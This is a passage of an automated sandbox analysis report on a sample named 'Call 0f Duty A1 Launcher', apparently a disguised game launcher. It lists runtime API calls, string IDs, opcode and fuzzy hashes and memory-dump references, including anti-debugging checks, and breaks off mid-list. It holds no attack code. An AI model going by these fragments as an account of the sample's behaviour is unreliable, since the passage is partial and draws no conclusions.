                                                                                                • API ID: AddressProc$HandleModule
                                                                                                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                • API String ID: 667068680-295688737
                                                                                                • Opcode ID: 50d46d1ef325438ef93db05ca425a465f5e485e13f79b4dc258f2f58395b6cdb
                                                                                                • Instruction ID: 908fcd08c1b637436dd30c17a9b086650dbb72c9ecd55a86936556a942be4431
                                                                                                • Opcode Fuzzy Hash: 50d46d1ef325438ef93db05ca425a465f5e485e13f79b4dc258f2f58395b6cdb
                                                                                                • Instruction Fuzzy Hash: 66611B71D93395ABC7806FF5AD098E63FEBAB497123416517F101D23A2DBB46081DBB0
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 006BCF90
                                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 006BD216
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cpp_errorCurrentThreadThrow_std::_
                                                                                                • String ID:
                                                                                                • API String ID: 350343453-0
                                                                                                • Opcode ID: 2002d6d2764030d7748889961372e222af8929f356465018f17d112fd29f270c
                                                                                                • Instruction ID: 1c2b1330f6747b251a709c01380ecf5e4619d54eca8dc3ddd1c4eac91000cd20
                                                                                                • Opcode Fuzzy Hash: 2002d6d2764030d7748889961372e222af8929f356465018f17d112fd29f270c
                                                                                                • Instruction Fuzzy Hash: 10F1FAB6E505104FEB008A7CC8A83DF6BE78B66330F2A5729DA745F7D2D627444A8F40
                                                                                                APIs
                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 006CC8CB
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 006CC9BF
                                                                                                • FindClose.KERNEL32(00000000), ref: 006CC9FE
                                                                                                • FindClose.KERNEL32(00000000), ref: 006CCA31
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 1164774033-0
                                                                                                • Opcode ID: 5d434c009431431f9e96fda4cb132caf70d33b1f8dbce5fec8ec7a82d97b6f3c
                                                                                                • Instruction ID: e1ba9ac6d4a19e085011d63527435bebb1622fe4b7eff3923972522f0ef287c1
                                                                                                • Opcode Fuzzy Hash: 5d434c009431431f9e96fda4cb132caf70d33b1f8dbce5fec8ec7a82d97b6f3c
                                                                                                • Instruction Fuzzy Hash: 5E719C719051689EDF20AF688C9DFFABBBAEB05320F1441DDE04DA3251DB308E859F64
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006C5450
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 006C551C
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006C553C
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 006C5546
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 254469556-0
                                                                                                • Opcode ID: cb0f828f566d0e1fc165e1460df8255fb873b9c1800992fa3505a16f38f981c0
                                                                                                • Instruction ID: 0eef99cb8f4c28cf753447987f8a962271fa6ca91bcee1225882df9923367125
                                                                                                • Opcode Fuzzy Hash: cb0f828f566d0e1fc165e1460df8255fb873b9c1800992fa3505a16f38f981c0
                                                                                                • Instruction Fuzzy Hash: 94310775D062189BDB50EFA4DD89BCDBBF9EF08304F1040AAE40DAB251EB709A85CF55
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006C7EC2
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006C7ECC
                                                                                                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 006C7ED9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: 53f8abd3113907f32609c27fcdf3ba895f00747a5c043ce2eae0af7434fa5198
                                                                                                • Instruction ID: 91e1dfbe944d705331a6b0a71d50caeb83aa4a7d4cdb7f5460664fe0bae4789d
                                                                                                • Opcode Fuzzy Hash: 53f8abd3113907f32609c27fcdf3ba895f00747a5c043ce2eae0af7434fa5198
                                                                                                • Instruction Fuzzy Hash: E831B1759012289BCB61DF24DC89BD9BBB9FF08310F5041EAE41CA7251EB709F858F54
                                                                                                APIs
                                                                                                • ___std_exception_destroy.LIBVCRUNTIME ref: 006C2437
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___std_exception_destroy
                                                                                                • String ID:
                                                                                                • API String ID: 4194217158-0
                                                                                                • Opcode ID: 8ab89f956e21dd0cb277aba4becbee66848b6b554dec10b81ff1ca728c10a086
                                                                                                • Instruction ID: 00f8555e463d1256a6114908367a6fba73faa1c67f6108c49c0a4f0cdb8e4e69
                                                                                                • Opcode Fuzzy Hash: 8ab89f956e21dd0cb277aba4becbee66848b6b554dec10b81ff1ca728c10a086
                                                                                                • Instruction Fuzzy Hash: 1FA26966A555844FEB024AB884B93DF6FE24B6B730F6A2755C6F06F2D3D50B000B9B60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: -g}5
                                                                                                • API String ID: 0-4071012034
                                                                                                • Opcode ID: 567013c6bcfcec0ed984ede7dc98578dd9fcade33fdd7421d722b80fb3fb8ae4
                                                                                                • Instruction ID: 8ea8807034bc4fccb2784d9b4586b8f85d958b0e1939b7b23fdcef5b5a28780f
                                                                                                • Opcode Fuzzy Hash: 567013c6bcfcec0ed984ede7dc98578dd9fcade33fdd7421d722b80fb3fb8ae4
                                                                                                • Instruction Fuzzy Hash: 4D9299A6A556C45FEF024AB8D4A93DF6FF24B6B331F6E2B5586E01F2D3C507004A9B10
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,006D1F2D,?,?,00000008,?,?,006D1AFF,00000000), ref: 006D21FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: cedc832e9b5cb0ddd6865a8cd850511f2ba99cf02ac444bde6fd4d07f98c2912
                                                                                                • Instruction ID: e12bee59aeb64cfb9dd2a9737be7b12ef9bafb134d931f504bdee9efef9d371c
                                                                                                • Opcode Fuzzy Hash: cedc832e9b5cb0ddd6865a8cd850511f2ba99cf02ac444bde6fd4d07f98c2912
                                                                                                • Instruction Fuzzy Hash: E6B18D3191060A9FD715CF28C89ABA47BE2FF55324F25C259E999CF3A1C335DA82CB40
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006C5216
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 2325560087-0
                                                                                                • Opcode ID: 566eb3291d128a0b353ca183f496aad1b379b50dbf08db62136d6b92fb543d78
                                                                                                • Instruction ID: bbf4282cf3b9ed63da971586431ccc84352aaced95c3a27989768c024cec5af9
                                                                                                • Opcode Fuzzy Hash: 566eb3291d128a0b353ca183f496aad1b379b50dbf08db62136d6b92fb543d78
                                                                                                • Instruction Fuzzy Hash: 5D515971D1265A8FDB15CF54D881BAAB7F2FB48350F24952ED406EB350E3B4A940CF90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: k#fz
                                                                                                • API String ID: 0-1948189604
                                                                                                • Opcode ID: 4d01969b8c7478f929a4a958de43dc9422d73e4569bf4881ae646b391872ce71
                                                                                                • Instruction ID: e5f25891da5aea1fcdd92e3478adcb48a8a8484e03882b62794cf85180c433ea
                                                                                                • Opcode Fuzzy Hash: 4d01969b8c7478f929a4a958de43dc9422d73e4569bf4881ae646b391872ce71
                                                                                                • Instruction Fuzzy Hash: CED121B2E115188FDB54CFBDC94069DB7F2AB48720F2A8369E875FB2D4D63499418B80
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00015560), ref: 006C543D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: eefefd46084ec6d86df3edac817336df16886298047df7a276047c2b83167269
                                                                                                • Instruction ID: 0c77950d3a2f710c6e781b7ada777abc860d7fecf01b243a516bfb7449227279
                                                                                                • Opcode Fuzzy Hash: eefefd46084ec6d86df3edac817336df16886298047df7a276047c2b83167269
                                                                                                • Instruction Fuzzy Hash:
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: 7feff8f90f9c4eb5f8035ed38ade6937c6f50b514580e7fca80bf4583230858d
                                                                                                • Instruction ID: 1fde6011840cccd9feae1e0bfe53bafd446cf8b0864753d801f5d6be015394ff
                                                                                                • Opcode Fuzzy Hash: 7feff8f90f9c4eb5f8035ed38ade6937c6f50b514580e7fca80bf4583230858d
                                                                                                • Instruction Fuzzy Hash: 35A00170E432068BDB809F76AF0921A3BEBAA856A2705A0AAA405C5261EA349455DB11
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 71154a1930fc2315ccb80b21b7535e3f0a7830279197253a72698aaff11504a6
                                                                                                • Instruction ID: 0c6f9da338cfa484394137450b0f6ceeaacd13697140d180bf19ef2a2b2a21da
                                                                                                • Opcode Fuzzy Hash: 71154a1930fc2315ccb80b21b7535e3f0a7830279197253a72698aaff11504a6
                                                                                                • Instruction Fuzzy Hash: 6732C276E446844FEB018ABCC4A53DF6FF24B6B334F2A2729C5A46F3D6D917440A8B50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0baa515746910fd5aa79794a5bae178b1369db83d50abec4b47443cc081bdf94
                                                                                                • Instruction ID: 9031cd8783babd9bb2bbf0c4534f405674ce6d676468cdf26d452dc574d270d9
                                                                                                • Opcode Fuzzy Hash: 0baa515746910fd5aa79794a5bae178b1369db83d50abec4b47443cc081bdf94
                                                                                                • Instruction Fuzzy Hash: 3F02B377A916504FEF01497CC8B83DB1BE387A7735E2A6726CAB05B3E2C55B000E9B50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f044fb9362481d53d9d05bd14e737e3cd80bc72ec7aede87821531eddb32df6c
                                                                                                • Instruction ID: f8e79d2c93c1f9e083c9712bfe87875e22d05be9c0a78aff134d8a3f190d0fc0
                                                                                                • Opcode Fuzzy Hash: f044fb9362481d53d9d05bd14e737e3cd80bc72ec7aede87821531eddb32df6c
                                                                                                • Instruction Fuzzy Hash: 46E10972A505504FDF008A7CC8A93DF2FE2476B334F2A2726D9B46F7E2D657044A9B50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40787bf34683cad09e0dfed7488aa681f090402aba2062415861faf14844aa71
                                                                                                • Instruction ID: 69e44e8c50ed16e0a1da8a0b89e85c858be4901ae828c42ce012eb3791b08e54
                                                                                                • Opcode Fuzzy Hash: 40787bf34683cad09e0dfed7488aa681f090402aba2062415861faf14844aa71
                                                                                                • Instruction Fuzzy Hash: 2BD06C3A645A58AFC310CF49E840D41F7A9FB89670B164466EA0893B20C331F811CAE0
                                                                                                APIs
                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 006C91F2
                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 006C9300
                                                                                                • CatchIt.LIBVCRUNTIME ref: 006C9351
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 006C9452
                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 006C946D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                • String ID: 81m$@]l$csm$csm$csm
                                                                                                • API String ID: 4119006552-926957316
                                                                                                • Opcode ID: 787a90d51a5a1912c954df37cd3eb5491cd16af618686c734f22099c54396fa2
                                                                                                • Instruction ID: 1d4b87fdb8e68272982cb6ce47e7132fc7743d9e4f56ff722185605ead04e9c6
                                                                                                • Opcode Fuzzy Hash: 787a90d51a5a1912c954df37cd3eb5491cd16af618686c734f22099c54396fa2
                                                                                                • Instruction Fuzzy Hash: B3B16A31800209EFCF28DFA4C889EBEB7B6FF14310B15815EE8156B252D735DA52CBA5
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 006C6167
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 006C616F
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 006C61F8
